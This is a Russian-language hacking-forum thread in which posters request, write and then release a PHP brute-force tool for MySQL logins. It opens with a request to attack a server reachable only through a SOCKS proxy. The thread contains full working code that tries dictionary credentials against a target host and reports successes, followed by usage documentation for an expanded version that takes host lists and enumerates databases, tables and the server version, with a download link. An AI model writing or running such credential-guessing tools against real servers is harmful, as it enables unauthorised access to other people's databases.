Нужен скрипт для бурта mysql, на край нужен софт, пущу через сокс, трабл в том что mysql не видно из нета.
Code: <?php $target = "127.0.0.1:3306"; // Реквизиты хоста $dictionary = "brute.dic"; // Путь к словарю if (!file_exists($dictionary)) die("Error: dictionary not found!"); $file_id = fopen($dictionary, "r") or die("Error: could not open dictionary!"); while (!feof($file_id)) { $line = trim(fgets($file_id, 1024)); if (strlen($line) > 0) { $dic_data = split(":", $line); if (count($dic_data) != 3) print("Error: wrong data - skipping current line"); else { $user = strval($dic_data[0]); $password = strval($dic_data[1]); $database = strval($dic_data[2]); printf("Trying USER=%s PASSWD=%s DBNAME=%s. Result: ", $user, $password, $database); $db_id = @mysql_connect($target, $user, $password); if (!is_resource($db_id)) print("<font color=\"red\">failed</font><br>\n"); else { print("<font color=\"green\"><b>!!! SUCCESS !!!</b></font><br>\n"); printf("Trying to get database '%s' for user '%s'. Result: ", $database, $user); if (!@mysql_selectdb($database)) print("<font color=\"red\">failed</font><br>\n"); else print("<font color=\"green\"><b>!!! SUCCESS !!!</b></font><br>\n"); } @mysql_close($db_id); } } } fclose($file_id); ?> Словарь формата: USERASSATABASE. Результат теста на локальном мускле: Это имел в виду?
groundhog Можешь слегка модфицировать свой скриптик что бы брутил еще допутим по листу ip пасс что была менюшка и какойто интерфейс. И собственно зарелизить на ачате как тулзу для брута, сама идея довольно интересная. Если зарелизишь подкину словарик.
[ cash ], без проблем... Составь ТЗ, в котором опиши всё, что хочешь от скрипта, вплоть до визуальных пожеланий и т.д. Скидывай в личку и через пару дней забубеню в лучшем виде.
Simple MySQL Brute Tool v.0.0.1 Simple MySQL Brute Tool v.0.0.1 [cash] edition smbrute.php [[-host=%HOST%] [-port=%PORT%] | [-hosts=%FILE%]] [-tables] [-databases] [-version] [-help] -accounts=%FILE% Утилита поддерживает следующий список параметров командной стоки: -help – вывод краткой справки по команде; -host – задаёт единичный целевой хост, к которому будет вестись подключение, данный параметр является необязательным и по умолчанию имеет значение 127.0.0.1; -port – задаёт порт на единичном целевом хосте, к которому будет вестись подключение, параметр является необязательным и по умолчанию имеет значение 3306; -tables – данный необязательный параметр позволяет отобразить список имеющихся таблиц в базе данных, в случае успешной авторизации (при условии, что у заданного пользователя будет полноценный доступ к этой информации); -hosts – задаёт файл-словарь с сетевыми записями, установка данного параметра приводит к игнорированию параметров -host и -port, так как все данные для подключений будут браться из словаря; -databases – данный необязательный параметр позволяет отобразить список всех имеющихся баз данных в случае успешной авторизации (при условии, что у заданного пользователя будет полноценный доступ к этой информации); -version – данный необязательный параметр позволяет определить версию сервера баз данных в случае успешной авторизации; -accounts – единственный обязательный параметр, задаёт файл-словарь с учётными записями, по которым и будет производится перебор; Сам скрипт и краткий мануал в формате pdf можно взять тут: http://slil.ru/24928577
